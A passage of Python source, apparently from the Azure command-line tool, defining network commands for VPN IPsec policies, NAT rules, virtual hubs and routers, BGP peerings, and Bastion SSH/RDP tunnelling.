VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def show_vpn_connection_device_config_script(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
vendor, device_family, firmware_version):
VpnDeviceScriptParameters = cmd.get_models('VpnDeviceScriptParameters')
parameters = VpnDeviceScriptParameters(
vendor=vendor,
device_family=device_family,
firmware_version=firmware_version
)
return client.vpn_device_configuration_script(resource_group_name, virtual_network_gateway_connection_name,
parameters=parameters)
# endregion
# region IPSec Policy Commands
def add_vnet_gateway_ipsec_policy(cmd, resource_group_name, gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
if gateway.vpn_client_configuration.vpn_client_ipsec_policies:
gateway.vpn_client_configuration.vpn_client_ipsec_policies.append(new_policy)
else:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = [new_policy]
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def clear_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = None
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
return LongRunningOperation(cmd.cli_ctx)(poller).vpn_client_configuration.vpn_client_ipsec_policies
def list_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
try:
return ncf.get(resource_group_name, gateway_name).vpn_client_configuration.vpn_client_ipsec_policies
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
def add_vpn_conn_ipsec_policy(cmd, client, resource_group_name, connection_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
conn = client.get(resource_group_name, connection_name)
if conn.ipsec_policies:
conn.ipsec_policies.append(new_policy)
else:
conn.ipsec_policies = [new_policy]
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
def clear_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name, no_wait=False):
conn = client.get(resource_group_name, connection_name)
conn.ipsec_policies = None
conn.use_policy_based_traffic_selectors = False
if no_wait:
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
return LongRunningOperation(cmd.cli_ctx)(poller).ipsec_policies
def list_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name):
return client.get(resource_group_name, connection_name).ipsec_policies
def assign_vnet_gateway_aad(cmd, resource_group_name, gateway_name,
aad_tenant, aad_audience, aad_issuer, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = aad_tenant
gateway.vpn_client_configuration.aad_audience = aad_audience
gateway.vpn_client_configuration.aad_issuer = aad_issuer
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_aad(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
return gateway.vpn_client_configuration
def remove_vnet_gateway_aad(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = None
gateway.vpn_client_configuration.aad_audience = None
gateway.vpn_client_configuration.aad_issuer = None
if cmd.supported_api_version(min_api='2020-11-01'):
gateway.vpn_client_configuration.vpn_authentication_types = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def add_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, internal_mappings, external_mappings,
rule_type=None, mode=None, ip_config_id=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
VirtualNetworkGatewayNatRule, VpnNatRuleMapping = cmd.get_models('VirtualNetworkGatewayNatRule',
'VpnNatRuleMapping')
gateway.nat_rules.append(
VirtualNetworkGatewayNatRule(type_properties_type=rule_type, mode=mode, name=name,
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in internal_mappings] if internal_mappings else None,
external_mappings=[VpnNatRuleMapping(address_space=e_map) for e_map in external_mappings] if external_mappings else None,
ip_configuration_id=ip_config_id))
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
return gateway.nat_rules
def remove_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
for rule in gateway.nat_rules:
if name == rule.name:
gateway.nat_rules.remove(rule)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
raise UnrecognizedArgumentError(f'Do not find nat_rules named {name}!!!')
# endregion
# region VirtualHub
def create_virtual_hub(cmd, client,
resource_group_name,
virtual_hub_name,
hosted_subnet,
public_ip_address=None,
location=None,
tags=None):
from azure.core.exceptions import HttpResponseError
from azure.cli.core.commands import LongRunningOperation
try:
client.get(resource_group_name, virtual_hub_name)
raise CLIError('The VirtualHub "{}" under resource group "{}" exists'.format(
virtual_hub_name, resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location,
virtual_wan=None,
sku='Standard')
vhub_poller = client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
ip_config = HubIpConfiguration(
subnet=SubResource(id=hosted_subnet),
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(
resource_group_name, virtual_hub_name, 'Default', ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
try:
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
except HttpResponseError:
pass
client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return client.get(resource_group_name, virtual_hub_name)
def virtual_hub_update_setter(client, resource_group_name, virtual_hub_name, parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, parameters)
def update_virtual_hub(cmd, instance,
tags=None,
allow_branch_to_branch_traffic=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('allow_branch_to_branch_traffic', allow_branch_to_branch_traffic)
return instance
def delete_virtual_hub(cmd, client, resource_group_name, virtual_hub_name, no_wait=False):
from azure.cli.core.commands import LongRunningOperation
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
ip_configs = list(vhub_ip_config_client.list(resource_group_name, virtual_hub_name))
if ip_configs:
ip_config = ip_configs[0] # There will always be only 1
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, ip_config.name)
LongRunningOperation(cmd.cli_ctx)(poller)
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name)
def list_virtual_hub(client, resource_group_name=None):
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_virtual_hub_bgp_connection(cmd, client, resource_group_name, virtual_hub_name, connection_name,
peer_asn, peer_ip, no_wait=False):
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=connection_name, peer_asn=peer_asn, peer_ip=peer_ip)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name,
virtual_hub_name, connection_name, vhub_bgp_conn)
def virtual_hub_bgp_connection_update_setter(client, resource_group_name,
virtual_hub_name, connection_name,
parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, connection_name, parameters)
def update_virtual_hub_bgp_connection(cmd, instance, peer_asn=None, peer_ip=None):
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def delete_virtual_hub_bgp_connection(client, resource_group_name,
virtual_hub_name, connection_name, no_wait=False):
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_learned_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_learned_routes(resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_advertised_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_advertised_routes(resource_group_name, virtual_hub_name, connection_name)
# endregion
# region VirtualRouter
def create_virtual_router(cmd,
resource_group_name,
virtual_router_name,
hosted_gateway=None,
hosted_subnet=None,
location=None,
tags=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
virtual_hub_name = virtual_router_name
try:
vhub_client.get(resource_group_name, virtual_hub_name)
raise CLIError('The VirtualRouter "{}" under resource group "{}" exists'.format(virtual_hub_name,
resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
# for old VirtualRouter
if hosted_gateway is not None:
VirtualRouter = cmd.get_models('VirtualRouter')
virtual_router = VirtualRouter(virtual_router_asn=None,
virtual_router_ips=[],
hosted_subnet=None,
hosted_gateway=SubResource(id=hosted_gateway),
location=location,
tags=tags)
return vrouter_client.begin_create_or_update(resource_group_name, virtual_router_name, virtual_router)
# for VirtualHub
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location, virtual_wan=None, sku='Standard')
ip_config = HubIpConfiguration(subnet=SubResource(id=hosted_subnet))
from azure.cli.core.commands import LongRunningOperation
vhub_poller = vhub_client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(resource_group_name,
virtual_hub_name,
'Default',
ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
vhub_client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_getter(cmd, resource_group_name, virtual_router_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
return vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_setter(cmd, resource_group_name, virtual_router_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs':
client = network_client_factory(cmd.cli_ctx).virtual_hubs
else:
client = network_client_factory(cmd.cli_ctx).virtual_routers
# If the client is virtual_hubs,
# the virtual_router_name represents virtual_hub_name and
# the parameters represents VirtualHub
return client.begin_create_or_update(resource_group_name, virtual_router_name, parameters)
def update_virtual_router(cmd, instance, tags=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_virtual_router(cmd, resource_group_name=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
if resource_group_name is not None:
vrouters = vrouter_client.list_by_resource_group(resource_group_name)
vhubs = vhub_client.list_by_resource_group(resource_group_name)
else:
vrouters = vrouter_client.list()
vhubs = vhub_client.list()
return list(vrouters) + list(vhubs)
def show_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
item = vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
virtual_hub_name = virtual_router_name
item = vhub_client.get(resource_group_name, virtual_hub_name)
return item
def delete_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
item = vrouter_client.begin_delete(resource_group_name, virtual_router_name)
except HttpResponseError:
from azure.cli.core.commands import LongRunningOperation
virtual_hub_name = virtual_router_name
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
LongRunningOperation(cmd.cli_ctx)(poller)
item = vhub_client.begin_delete(resource_group_name, virtual_hub_name)
return item
def create_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name, peer_asn, peer_ip):
# try VirtualRouter first
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
VirtualRouterPeering = cmd.get_models('VirtualRouterPeering')
virtual_router_peering = VirtualRouterPeering(peer_asn=peer_asn, peer_ip=peer_ip)
return vrouter_peering_client.begin_create_or_update(resource_group_name,
virtual_router_name,
peering_name,
virtual_router_peering)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=peering_name, peer_asn=peer_asn, peer_ip=peer_ip)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_create_or_update(resource_group_name, virtual_hub_name,
bgp_conn_name, vhub_bgp_conn)
def virtual_router_peering_update_getter(cmd, resource_group_name, virtual_router_name, peering_name):
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
from azure.core.exceptions import HttpResponseError
try:
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def virtual_router_peering_update_setter(cmd, resource_group_name, virtual_router_name, peering_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs/bgpConnections':
client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
else:
client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
# if the client is virtual_hub_bgp_connection,
# the virtual_router_name represents virtual_hub_name and
# the peering_name represents bgp_connection_name and
# the parameters represents BgpConnection
return client.begin_create_or_update(resource_group_name, virtual_router_name, peering_name, parameters)
def update_virtual_router_peering(cmd, instance, peer_asn=None, peer_ip=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def list_virtual_router_peering(cmd, resource_group_name, virtual_router_name):
virtual_hub_name = virtual_router_name
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
try:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
vrouter_peerings = list(vrouter_peering_client.list(resource_group_name, virtual_router_name))
except HttpResponseError:
vrouter_peerings = []
virtual_hub_name = virtual_router_name
try:
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connections
vhub_bgp_connections = list(vhub_bgp_conn_client.list(resource_group_name, virtual_hub_name))
except HttpResponseError:
vhub_bgp_connections = []
return list(vrouter_peerings) + list(vhub_bgp_connections)
def show_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def delete_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except: # pylint: disable=bare-except
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.begin_delete(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_delete(resource_group_name, virtual_hub_name, bgp_conn_name)
# endregion
# region service aliases
def list_service_aliases(cmd, location, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).available_service_aliases
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name, location=location)
return client.list(location=location)
# endregion
# region bastion
def create_bastion_host(cmd, resource_group_name, bastion_host_name, virtual_network_name,
public_ip_address, location=None, subnet='AzureBastionSubnet', scale_units=None, sku=None, tags=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
(BastionHost,
BastionHostIPConfiguration,
SubResource) = cmd.get_models('BastionHost',
'BastionHostIPConfiguration',
'SubResource')
ip_config_name = "bastion_ip_config"
ip_configuration = BastionHostIPConfiguration(name=ip_config_name,
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip_address))
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location,
tags=tags)
if cmd.supported_api_version(min_api='2021-03-01'):
sku_type = cmd.get_models('Sku')
sku = sku_type(name=sku)
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location,
scale_units=scale_units,
sku=sku,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
bastion_host_name=bastion_host_name,
parameters=bastion_host)
def list_bastion_host(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
SSH_EXTENSION_NAME = 'ssh'
SSH_EXTENSION_MODULE = 'azext_ssh.custom'
SSH_UTILS_EXTENSION_MODULE = 'azext_ssh.ssh_utils'
SSH_EXTENSION_VERSION = '0.1.3'
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _test_extension(extension_name):
from azure.cli.core.extension import (get_extension)
from pkg_resources import parse_version
ext = get_extension(extension_name)
if parse_version(ext.version) < parse_version(SSH_EXTENSION_VERSION):
raise CLIError('SSH Extension (version >= "{}") must be installed'.format(SSH_EXTENSION_VERSION))
def _get_ssh_path(ssh_command="ssh"):
import os
ssh_path = ssh_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
is_32bit = arch_data[0] == '32bit'
sys_path = 'SysNative' if is_32bit else 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
ssh_path = os.path.join(system32_path, "openSSH", (ssh_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run ssh from path %s", ssh_path)
if not os.path.isfile(ssh_path):
raise CLIError("Could not find " + ssh_command + ".exe. Is the OpenSSH client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
return ssh_path
def _get_rdp_path(rdp_command="mstsc"):
import os
rdp_path = rdp_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
sys_path = 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
rdp_path = os.path.join(system32_path, (rdp_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run rdp from path %s", rdp_path)
if not os.path.isfile(rdp_path):
raise CLIError("Could not find " + rdp_command + ".exe. Is the rdp client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
return rdp_path
def _get_host(username, ip):
return username + "@" + ip
def _build_args(cert_file, private_key_file):
private_key = []
certificate = []
if private_key_file:
private_key = ["-i", private_key_file]
if cert_file:
certificate = ["-o", "CertificateFile=" + cert_file]
return private_key + certificate
def ssh_bastion_host(cmd, auth_type, target_resource_id, resource_group_name, bastion_host_name, resource_port=None, username=None, ssh_key=None):
import os
_test_extension(SSH_EXTENSION_NAME)
if not resource_port:
resource_port = 22
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
if auth_type.lower() == 'password':
if username is None:
raise RequiredArgumentMissingError("Please enter username with --username.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
elif auth_type.lower() == 'aad':
azssh = _get_azext_module(SSH_EXTENSION_NAME, SSH_EXTENSION_MODULE)
azssh_utils = _get_azext_module(SSH_EXTENSION_NAME, SSH_UTILS_EXTENSION_MODULE)
cert_folder = tempfile.mkdtemp(prefix="aadsshcert")
if not os.path.isdir(cert_folder):
os.makedirs(cert_folder)
azssh.ssh_cert(cmd, cert_path=os.path.join(cert_folder, "id_rsa.pub-aadcert.pub"))
private_key_file = os.path.join(cert_folder, "id_rsa")
cert_file = os.path.join(cert_folder, "id_rsa.pub-aadcert.pub")
username = azssh_utils.get_ssh_cert_principals(cert_file)[0]
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(cert_file, private_key_file)
elif auth_type.lower() == 'ssh-key':
if username is None or ssh_key is None:
raise RequiredArgumentMissingError("Please enter username --username and ssh cert location --ssh-key.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(None, ssh_key)
else:
raise UnrecognizedArgumentError("Unknown auth type. Use one of password, aad or ssh-key.")
command = command + ["-p", str(tunnel_server.local_port)]
command = command + ['-o', "StrictHostKeyChecking=no", '-o', "UserKnownHostsFile=/dev/null"]
command = command + ['-o', "LogLevel=Error"]
logger.debug("Running ssh command %s", ' '.join(command))
try:
subprocess.call(command, shell=platform.system() == 'Windows')
except Exception as ex:
raise CLIInternalError(ex)
def rdp_bastion_host(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port=None):
if not resource_port:
resource_port = 3389
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
if platform.system() == 'Windows':
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
command = [_get_rdp_path(), "/v:localhost:{0}".format(tunnel_server.local_port)]
logger.debug("Running rdp command %s", ' '.join(command))
from ._process_helper import launch_and_wait
launch_and_wait(command)
tunnel_server.cleanup()
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
def get_tunnel(cmd, resource_group_name, name, vm_id, resource_port, port=None):
from .tunnel import TunnelServer
client = network_client_factory(cmd.cli_ctx).bastion_hosts
bastion = client.get(resource_group_name, name)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
tunnel_server = TunnelServer(cmd.cli_ctx, 'localhost', port, bastion, vm_id, resource_port)
return tunnel_server
def create_bastion_tunnel(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port, port, timeout=None):
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port, port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
# endregion
# region security partner provider
def create_security_partner_provider(cmd, resource_group_name, security_partner_provider_name,
security_provider_name, virtual_hub, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
SecurityPartnerProvider, SubResource = cmd.get_models('SecurityPartnerProvider', 'SubResource')
security_partner_provider = SecurityPartnerProvider(security_provider_name=security_provider_name,
virtual_hub=SubResource(id=virtual_hub),
location=location,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
security_partner_provider_name=security_partner_provider_name,
parameters=security_partner_provider)
def update_security_partner_provider(instance, cmd, security_provider_name=None, virtual_hub=None, tags=None):
with cmd.update_context(instance) as c:
c.set_param('security_provider_name', security_provider_name)
c.set_param('virtual_hub', virtual_hub)
c.set_param('tags', tags)
return instance
def list_security_partner_provider(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
# endregion
# region network gateway connection
def reset_shared_key(cmd, client, virtual_network_gateway_connection_name, key_length, resource_group_name=None):
ConnectionResetSharedKey = cmd.get_models('ConnectionResetSharedKey')
shared_key = ConnectionResetSharedKey(key_length=key_length)
return client.begin_reset_shared_key(resource_group_name=resource_group_name,
